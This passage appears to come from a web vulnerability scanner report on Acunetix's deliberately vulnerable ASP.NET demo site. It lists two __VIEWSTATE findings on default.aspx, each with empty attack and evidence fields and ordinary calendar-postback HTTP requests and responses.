Injections, Cross-site Scripting (XSS), and more. It was built using ASP.NET and it shows how bad programming leads to vulnerabilities. Do not visit the links in the comments. They are posted by malicious parties who are trying to exploit this site to their advantage. Comments are purged daily.</p> </div> </HTML>
URL	http://testaspnet.vulnweb.com/default.aspx
Method	POST
Parameter	__VIEWSTATE
Attack
Evidence
Show / hide Request and Response
Request Header - size: 581 bytes.	POST http://testaspnet.vulnweb.com/default.aspx HTTP/1.1 Host: testaspnet.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:108.0) Gecko/20100101 Firefox/108.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,/;q=0.8 Accept-Language: en-US,en;q=0.5 Content-Type: application/x-www-form-urlencoded Content-Length: 1161 Origin: http://testaspnet.vulnweb.com Connection: keep-alive Referer: http://testaspnet.vulnweb.com/default.aspx Cookie: ASP.NET_SessionId=muid3q45ssyhyr55mj4gu4zc Upgrade-Insecure-Requests: 1
Request Body - size: 1,161 bytes.	__EVENTTARGET=RightPanel1%24Calendar&__EVENTARGUMENT=8262&__VIEWSTATE=%2FwEPDwUKLTEwNTI0MjkwNQ9kFgICAQ9kFgQCAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkAgUPZBYCZg88KwAKAQAPFgQeC1Zpc2libGVEYXRlBgBABsdQc9oIHgJTRBYBBgDAzhhRftoIZGRkE%2Fg9jiJGHmlpHdeDxi8ekwU50xU%3D&__VIEWSTATEGENERATOR=CA0B0334&__EVENTVALIDATION=%2FwEWVwLz7K6bAQKcisLvAQLiidrKBQL7pJ3HDAL7pJ3HDAL7pPGsCQL7pPGsCQL7pOXDAgL7pOXDAgLcy%2FfoBQLcy%2FfoBQLcy%2BuPDQLcy%2BuPDQLcy5%2BiBgLcy5%2BiBgLcy7P5DwLcy7P5DwLcy6ecBwLcy6ecBwLcy9swAtzL2zAC3MvP1wkC3MvP1wkC3Mvj6gIC3Mvj6gIC3MvX0w8C3MvX0w8C3MvL9ggC3MvL9ggCsdLVnwoCsdLVnwoCsdLJsgMCsdLJsgMCsdL9yQwCsdL9yQwCsdKR7AUCsdKR7AUCsdKFgw0CsdKFgw0CsdK5pgYCsdK5pgYCsdKt%2FQ8CsdKt%2FQ8CsdLBkQcCsdLBkQcCsdK1%2BQUCsdK1%2BQUCsdKpnA0CsdKpnA0Civm7BQKK%2BbsFAor5r9gJAor5r9gJAor5w%2FwCAor5w%2FwCAor595MKAor595MKAor567YDAor567YDAor5n80MAor5n80MAor5s%2BAFAor5s%2BAFAor5p4cNAor5p4cNAor5m%2BwLAor5m%2BwLAor5j4MDAor5j4MDAr%2BT%2B8QJAr%2BT%2B8QJAr%2BT75sBAr%2BT75sBAr%2BTg74KAr%2BTg74KAr%2BTt9UDAr%2BTt9UDAr%2BTq%2BgMAr%2BTq%2BgMAr%2BT34wEAr%2BT34wEAr%2BT86MNAr%2BT86MNAr%2BT58YGAr%2BT58YGAr%2BT268DAr%2BT268D2LsGppjY7TuPpKmH%2FRS5Zax5xuE%3D
Response Header - size: 222 bytes.	HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/8.5 X-AspNet-Version: 2.0.50727 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 05:20:45 GMT Content-Length: 12565
Response Body - size: 12,565 bytes.	<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" > <HTML> <HEAD> <title>acublog news</title> <META http-equiv="Content-Type" content="text/html; charset=windows-1252"> <meta content="Microsoft Visual Studio .NET 7.1" name="GENERATOR"> <meta content="C#" name="CODE_LANGUAGE"> <meta content="JavaScript" name="vs_defaultClientScript"> <meta content="http://schemas.microsoft.com/intellisense/ie5" name="vs_targetSchema"> <LINK href="styles.css" type="text/css" rel="stylesheet"> </HEAD> <body> <form name="Form1" method="post" action="default.aspx" id="Form1"> <div> <input type="hidden" name="__EVENTTARGET" id="__EVENTTARGET" value="" /> <input type="hidden" name="__EVENTARGUMENT" id="__EVENTARGUMENT" value="" /> <input type="hidden" name="__VIEWSTATE" id="__VIEWSTATE" value="/wEPDwUKLTEwNTI0MjkwNQ9kFgICAQ9kFgQCAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkAgUPZBYCZg88KwAKAQAPFgQeC1Zpc2libGVEYXRlBgBABsdQc9oIHgJTRBYBBgDAzhhRftoIZGRkE/g9jiJGHmlpHdeDxi8ekwU50xU=" /> </div> <script type="text/javascript"> //<![CDATA[ var theForm = document.forms['Form1']; if (!theForm) { theForm = document.Form1; } function __doPostBack(eventTarget, eventArgument) { if (!theForm.onsubmit \|\| (theForm.onsubmit() != false)) { theForm.__EVENTTARGET.value = eventTarget; theForm.__EVENTARGUMENT.value = eventArgument; theForm.submit(); } } //]]> </script> <div> <input type="hidden" name="__VIEWSTATEGENERATOR" id="__VIEWSTATEGENERATOR" value="CA0B0334" /> <input type="hidden" name="__EVENTVALIDATION" id="__EVENTVALIDATION" value="/wEWVwLz7K6bAQKcisLvAQLiidrKBQL7pJ3HDAL7pJ3HDAL7pPGsCQL7pPGsCQL7pOXDAgL7pOXDAgLcy/foBQLcy/foBQLcy+uPDQLcy+uPDQLcy5+iBgLcy5+iBgLcy7P5DwLcy7P5DwLcy6ecBwLcy6ecBwLcy9swAtzL2zAC3MvP1wkC3MvP1wkC3Mvj6gIC3Mvj6gIC3MvX0w8C3MvX0w8C3MvL9ggC3MvL9ggCsdLVnwoCsdLVnwoCsdLJsgMCsdLJsgMCsdL9yQwCsdL9yQwCsdKR7AUCsdKR7AUCsdKFgw0CsdKFgw0CsdK5pgYCsdK5pgYCsdKt/Q8CsdKt/Q8CsdLBkQcCsdLBkQcCsdK1+QUCsdK1+QUCsdKpnA0CsdKpnA0Civm7BQKK+bsFAor5r9gJAor5r9gJAor5w/wCAor5w/wCAor595MKAor595MKAor567YDAor567YDAor5n80MAor5n80MAor5s+AFAor5s+AFAor5p4cNAor5p4cNAor5m+wLAor5m+wLAor5j4MDAor5j4MDAr+T+8QJAr+T+8QJAr+T75sBAr+T75sBAr+Tg74KAr+Tg74KAr+Tt9UDAr+Tt9UDAr+Tq+gMAr+Tq+gMAr+T34wEAr+T34wEAr+T86MNAr+T86MNAr+T58YGAr+T58YGAr+T268DAr+T268D2LsGppjY7TuPpKmH/RS5Zax5xuE=" /> </div> <TABLE id="Table1" cellSpacing="0" cellPadding="5" width="790" align="center" border="0"> <TR> <TD style="COLOR: #e6dccf" bgColor="#806640" height="75"><a href="https://www.acunetix.com/"><IMG src="images/logo_acunetix.gif" align="absMiddle" border="0" alt="Acunetix website security"></a></TD> <TD style="FONT-WEIGHT: bold; FONT-SIZE: small; COLOR: #e6dccf" align="right" bgColor="#806640" height="75">Test Website for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></TD> </TR> </TABLE> <TABLE id="Table2" cellSpacing="0" cellPadding="5" width="790" align="center" border="0"> <TR> <TD class="MenuBar" style="BORDER-LEFT: #806040 1px solid"><A class="menu" title="About" href="about.aspx">about</A> <A class="menu" title="Latest news" href="default.aspx">news</A> <a href="login.aspx" id="Mainmenu2_lnkLog" class="menu" name="lnkLog">login</a> <a href="Signup.aspx" id="Mainmenu2_lnkSignup" class="menu" name="lnkSignup"> signup</a> <A class="menu" title="Network scanner" href="https://www.acunetix.com/vulnerability-scanner/network-vulnerability-scanner/">network scanner</A> <A class="menu" title="Network vuln help" href="https://www.acunetix.com/blog/articles/network-vulnerability-assessment-gotchas-avoid/">network vuln help</A> </TD> <td class="MenuBar" align="right" width="50px"> <A href="rssFeed.aspx"><IMG src="images/rss.gif" border="0"></A> </td> </TR> </TABLE> <TABLE id="Table1" cellSpacing="0" cellPadding="10" width="790" align="center" border="0"> <TR> <TD id="tdPageData" valign="top"> </TD> <TD vAlign="top" width="200"> <table id="RightPanel1_Calendar" class="Calendar" cellspacing="0" cellpadding="1" title="Calendar" border="0" style="background-color:#E6DCCF;border-width:1px;border-style:Solid;font-size:X-Small;border-collapse:collapse;"> <tr><td colspan="7" style="background-color:#E6B873;"><table class="Calendar" cellspacing="0" border="0" style="font-size:X-Small;font-weight:bold;width:100%;border-collapse:collapse;"> <tr><td style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8217')" style="color:Black" title="Go to the previous month"><</a></td><td align="center" style="width:70%;">August 2022</td><td align="right" style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8279')" style="color:Black" title="Go to the next month">></a></td></tr> </table></td></tr><tr><th align="center" abbr="Sunday" scope="col">Sun</th><th align="center" abbr="Monday" scope="col">Mon</th><th align="center" abbr="Tuesday" scope="col">Tue</th><th align="center" abbr="Wednesday" scope="col">Wed</th><th align="center" abbr="Thursday" scope="col">Thu</th><th align="center" abbr="Friday" scope="col">Fri</th><th align="center" abbr="Saturday" scope="col">Sat</th></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8247')" style="color:Black" title="July 31">31</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8248')" style="color:Black" title="August 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8249')" style="color:Black" title="August 02">2</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8250')" style="color:Black" title="August 03">3</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8251')" style="color:Black" title="August 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8252')" style="color:Black" title="August 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8253')" style="color:Black" title="August 06">6</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8254')" style="color:Black" title="August 07">7</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8255')" style="color:Black" title="August 08">8</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8256')" style="color:Black" title="August 09">9</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8257')" style="color:Black" title="August 10">10</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8258')" style="color:Black" title="August 11">11</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8259')" style="color:Black" title="August 12">12</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8260')" style="color:Black" title="August 13">13</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8261')" style="color:Black" title="August 14">14</a></td><td align="center" style="color:White;background-color:Silver;width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8262')" style="color:White" title="August 15">15</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8263')" style="color:Black" title="August 16">16</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8264')" style="color:Black" title="August 17">17</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8265')" style="color:Black" title="August 18">18</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8266')" style="color:Black" title="August 19">19</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8267')" style="color:Black" title="August 20">20</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8268')" style="color:Black" title="August 21">21</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8269')" style="color:Black" title="August 22">22</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8270')" style="color:Black" title="August 23">23</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8271')" style="color:Black" title="August 24">24</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8272')" style="color:Black" title="August 25">25</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8273')" style="color:Black" title="August 26">26</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8274')" style="color:Black" title="August 27">27</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8275')" style="color:Black" title="August 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8276')" style="color:Black" title="August 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8277')" style="color:Black" title="August 30">30</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8278')" style="color:Black" title="August 31">31</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8279')" style="color:Black" title="September 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8280')" style="color:Black" title="September 02">2</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8281')" style="color:Black" title="September 03">3</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8282')" style="color:Black" title="September 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8283')" style="color:Black" title="September 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8284')" style="color:Black" title="September 06">6</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8285')" style="color:Black" title="September 07">7</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8286')" style="color:Black" title="September 08">8</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8287')" style="color:Black" title="September 09">9</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8288')" style="color:Black" title="September 10">10</a></td></tr> </table><BR> <a href="rssFeed.aspx">Get RSS feed</a> </TD> </TR> <TR> <TD colSpan="2"> </TD> </TR> </TABLE> </form> </body> <div style="background-color:lightgray;width:40%;margin:auto;position:absolute;left:30%;bottom:2px;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:5%;padding-right:5%"><b>Warning</b>: This is not a blog. This is a test site for Acunetix. It is vulnerable to SQL Injections, Cross-site Scripting (XSS), and more. It was built using ASP.NET and it shows how bad programming leads to vulnerabilities. Do not visit the links in the comments. They are posted by malicious parties who are trying to exploit this site to their advantage. Comments are purged daily.</p> </div> </HTML>
URL	http://testaspnet.vulnweb.com/default.aspx
Method	POST
Parameter	__VIEWSTATE
Attack
Evidence
Show / hide Request and Response
Request Header - size: 581 bytes.	POST http://testaspnet.vulnweb.com/default.aspx HTTP/1.1 Host: testaspnet.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:108.0) Gecko/20100101 Firefox/108.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,/;q=0.8 Accept-Language: en-US,en;q=0.5 Content-Type: application/x-www-form-urlencoded Content-Length: 1173 Origin: http://testaspnet.vulnweb.com Connection: keep-alive Referer: http://testaspnet.vulnweb.com/default.aspx Cookie: ASP.NET_SessionId=muid3q45ssyhyr55mj4gu4zc Upgrade-Insecure-Requests: 1
Request Body - size: 1,173 bytes.	__EVENTTARGET=RightPanel1%24Calendar&__EVENTARGUMENT=8341&__VIEWSTATE=%2FwEPDwUKLTEwNTI0MjkwNQ9kFgICAQ9kFgQCAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkAgUPZBYCZg88KwAKAQAPFgQeC1Zpc2libGVEYXRlBgBABwWcu9oIHgJTRBYBBgAAcS9lvNoIZGRkYfJsCP37J%2FyuOz6VST%2BdVzFASAg%3D&__VIEWSTATEGENERATOR=CA0B0334&__EVENTVALIDATION=%2FwEWVwLk%2BK2uAgLHkIz%2BDgL%2BkLjwCwLmnZe5AwLmnZe5AwLmnYvcDALmnYvcDAL7pJXFDwL7pJXFDwL7pImYBwL7pImYBwL7pL0%2FAvukvT8C%2B6TR0wkC%2B6TR0wkC%2B6TF9gIC%2B6TF9gIC%2B6T5jQoC%2B6T5jQoC%2B6TtoAMC%2B6TtoAMC%2B6SBxwwC%2B6SBxwwC%2B6T1rAkC%2B6T1rAkC%2B6TpwwIC%2B6TpwwIC3Mv76AUC3Mv76AUC3Mvvjw0C3Mvvjw0C3MuDogYC3MuDogYC3Mu3%2BQ8C3Mu3%2BQ8C3MurnAcC3MurnAcC3MvfMALcy98wAtzL89cJAtzL89cJAtzL5%2BoCAtzL5%2BoCAtzL29MPAtzL29MPAtzLz%2FYIAtzLz%2FYIArHS2Z8KArHS2Z8KArHSzbIDArHSzbIDArHS4ckMArHS4ckMArHSlewFArHSlewFArHSiYMNArHSiYMNArHSvaYGArHSvaYGArHS0foPArHS0foPArHSxZEHArHSxZEHArHSufkFArHSufkFArHSrZwNArHSrZwNAor5vwUCivm%2FBQKK%2BdPZCQKK%2BdPZCQKK%2Bcf8AgKK%2Bcf8AgKK%2BfuTCgKK%2BfuTCgKK%2Be%2B2AwKK%2Be%2B2AwKK%2BYPNDAKK%2BYPNDAKK%2BbfgBQKK%2BbfgBQKK%2BauHDQKK%2BauHDQKK%2BZ%2FsCwKK%2BZ%2FsCwKK%2BbODAwKK%2BbODAyv8LTM85P7pq7Zh2T6%2FxCq1F13C
Response Header - size: 222 bytes.	HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/8.5 X-AspNet-Version: 2.0.50727 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 04:48:28 GMT Content-Length: 12617
Response Body - size: 12,617 bytes.	<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" > <HTML> <HEAD> <title>acublog news</title> <META http-equiv="Content-Type" content="text/html; charset=windows-1252"> <meta content="Microsoft Visual Studio .NET 7.1" name="GENERATOR"> <meta content="C#" name="CODE_LANGUAGE"> <meta content="JavaScript" name="vs_defaultClientScript"> <meta content="http://schemas.microsoft.com/intellisense/ie5" name="vs_targetSchema"> <LINK href="styles.css" type="text/css" rel="stylesheet"> </HEAD> <body> <form name="Form1" method="post" action="default.aspx" id="Form1"> <div> <input type="hidden" name="__EVENTTARGET" id="__EVENTTARGET" value="" /> <input type="hidden" name="__EVENTARGUMENT" id="__EVENTARGUMENT" value="" /> <input type="hidden" name="__VIEWSTATE" id="__VIEWSTATE" value="/wEPDwUKLTEwNTI0MjkwNQ9kFgICAQ9kFgQCAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkAgUPZBYCZg88KwAKAQAPFgQeC1Zpc2libGVEYXRlBgBABwWcu9oIHgJTRBYBBgAAcS9lvNoIZGRkYfJsCP37J/yuOz6VST+dVzFASAg=" /> </div> <script type="text/javascript"> //<![CDATA[ var theForm = document.forms['Form1']; if (!theForm) { theForm = document.Form1; } function __doPostBack(eventTarget, eventArgument) { if (!theForm.onsubmit \|\| (theForm.onsubmit() != false)) { theForm.__EVENTTARGET.value = eventTarget; theForm.__EVENTARGUMENT.value = eventArgument; theForm.submit(); } } //]]> </script> <div> <input type="hidden" name="__VIEWSTATEGENERATOR" id="__VIEWSTATEGENERATOR" value="CA0B0334" /> <input type="hidden" name="__EVENTVALIDATION" id="__EVENTVALIDATION" value="/wEWVwLk+K2uAgLHkIz+DgL+kLjwCwLmnZe5AwLmnZe5AwLmnYvcDALmnYvcDAL7pJXFDwL7pJXFDwL7pImYBwL7pImYBwL7pL0/AvukvT8C+6TR0wkC+6TR0wkC+6TF9gIC+6TF9gIC+6T5jQoC+6T5jQoC+6TtoAMC+6TtoAMC+6SBxwwC+6SBxwwC+6T1rAkC+6T1rAkC+6TpwwIC+6TpwwIC3Mv76AUC3Mv76AUC3Mvvjw0C3Mvvjw0C3MuDogYC3MuDogYC3Mu3+Q8C3Mu3+Q8C3MurnAcC3MurnAcC3MvfMALcy98wAtzL89cJAtzL89cJAtzL5+oCAtzL5+oCAtzL29MPAtzL29MPAtzLz/YIAtzLz/YIArHS2Z8KArHS2Z8KArHSzbIDArHSzbIDArHS4ckMArHS4ckMArHSlewFArHSlewFArHSiYMNArHSiYMNArHSvaYGArHSvaYGArHS0foPArHS0foPArHSxZEHArHSxZEHArHSufkFArHSufkFArHSrZwNArHSrZwNAor5vwUCivm/BQKK+dPZCQKK+dPZCQKK+cf8AgKK+cf8AgKK+fuTCgKK+fuTCgKK+e+2AwKK+e+2AwKK+YPNDAKK+YPNDAKK+bfgBQKK+bfgBQKK+auHDQKK+auHDQKK+Z/sCwKK+Z/sCwKK+bODAwKK+bODAyv8LTM85P7pq7Zh2T6/xCq1F13C" /> </div> <TABLE id="Table1" cellSpacing="0" cellPadding="5" width="790" align="center" border="0"> <TR> <TD style="COLOR: #e6dccf" bgColor="#806640" height="75"><a href="https://www.acunetix.com/"><IMG src="images/logo_acunetix.gif" align="absMiddle" border="0" alt="Acunetix website security"></a></TD> <TD style="FONT-WEIGHT: bold; FONT-SIZE: small; COLOR: #e6dccf" align="right" bgColor="#806640" height="75">Test Website for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></TD> </TR> </TABLE> <TABLE id="Table2" cellSpacing="0" cellPadding="5" width="790" align="center" border="0"> <TR> <TD class="MenuBar" style="BORDER-LEFT: #806040 1px solid"><A class="menu" title="About" href="about.aspx">about</A> <A class="menu" title="Latest news" href="default.aspx">news</A> <a href="login.aspx" id="Mainmenu2_lnkLog" class="menu" name="lnkLog">login</a> <a href="Signup.aspx" id="Mainmenu2_lnkSignup" class="menu" name="lnkSignup"> signup</a> <A class="menu" title="Network scanner" href="https://www.acunetix.com/vulnerability-scanner/network-vulnerability-scanner/">network scanner</A> <A class="menu" title="Network vuln help" href="https://www.acunetix.com/blog/articles/network-vulnerability-assessment-gotchas-avoid/">network vuln help</A> </TD> <td class="MenuBar" align="right" width="50px"> <A href="rssFeed.aspx"><IMG src="images/rss.gif" border="0"></A> </td> </TR> </TABLE> <TABLE id="Table1" cellSpacing="0" cellPadding="10" width="790" align="center" border="0"> <TR> <TD id="tdPageData" valign="top"> </TD> <TD vAlign="top" width="200"> <table id="RightPanel1_Calendar" class="Calendar" cellspacing="0" cellpadding="1" title="Calendar" border="0" style="background-color:#E6DCCF;border-width:1px;border-style:Solid;font-size:X-Small;border-collapse:collapse;"> <tr><td colspan="7" style="background-color:#E6B873;"><table class="Calendar" cellspacing="0" border="0" style="font-size:X-Small;font-weight:bold;width:100%;border-collapse:collapse;"> <tr><td style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8309')" style="color:Black" title="Go to the previous month"><</a></td><td align="center" style="width:70%;">November 2022</td><td align="right" style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8370')" style="color:Black" title="Go to the next month">></a></td></tr> </table></td></tr><tr><th align="center" abbr="Sunday" scope="col">Sun</th><th align="center" abbr="Monday" scope="col">Mon</th><th align="center" abbr="Tuesday" scope="col">Tue</th><th align="center" abbr="Wednesday" scope="col">Wed</th><th align="center" abbr="Thursday" scope="col">Thu</th><th align="center" abbr="Friday" scope="col">Fri</th><th align="center" abbr="Saturday" scope="col">Sat</th></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8338')" style="color:Black" title="October 30">30</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8339')" style="color:Black" title="October 31">31</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8340')" style="color:Black" title="November 01">1</a></td><td align="center" style="color:White;background-color:Silver;width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8341')" style="color:White" title="November 02">2</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8342')" style="color:Black" title="November 03">3</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8343')" style="color:Black" title="November 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8344')" style="color:Black" title="November 05">5</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8345')" style="color:Black" title="November 06">6</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8346')" style="color:Black" title="November 07">7</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8347')" style="color:Black" title="November 08">8</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8348')" style="color:Black" title="November 09">9</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8349')" style="color:Black" title="November 10">10</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8350')" style="color:Black" title="November 11">11</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8351')" style="color:Black" title="November 12">12</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8352')" style="color:Black" title="November 13">13</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8353')" style="color:Black" title="November 14">14</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8354')" style="color:Black" title="November 15">15</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8355')" style="color:Black" title="November 16">16</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8356')" style="color:Black" title="November 17">17</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8357')" style="color:Black" title="November 18">18</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8358')" style="color:Black" title="November 19">19</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8359')" style="color:Black" title="November 20">20</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8360')" style="color:Black" title="November 21">21</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8361')" style="color:Black" title="November 22">22</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8362')" style="color:Black" title="November 23">23</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8363')" style="color:Black" title="November 24">24</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8364')" style="color:Black" title="November 25">25</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8365')" style="color:Black" title="November 26">26</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8366')" style="color:Black" title="November 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8367')" style="color:Black" title="November 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8368')" style="color:Black" title="November 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8369')" style="color:Black" title="November 30">30</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8370')" style="color:Black" title="December 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8371')" style="color:Black" title="December 02">2</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8372')" style="color:Black" title="December 03">3</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8373')" style="color:Black" title="December 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8374')" style="color:Black" title="December 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8375')" style="color:Black" title="December 06">6</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8376')" style="color:Black" title="December 07">7</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8377')" style="color:Black" title="December 08">8</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8378')" style="color:Black" title="December 09">9</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8379')" style="color:Black" title="December 10">10</a></td></tr> </table><BR> <a href="rssFeed.aspx">Get RSS feed</a> </TD> </TR> <TR> <TD colSpan="2"> </TD> </TR> </TABLE> </form> </body> <div style="background-color:lightgray;width:40%;margin:auto;position:absolute;left:30%;bottom:2px;text-align:center;font-size:12px;padding:1px"> <p 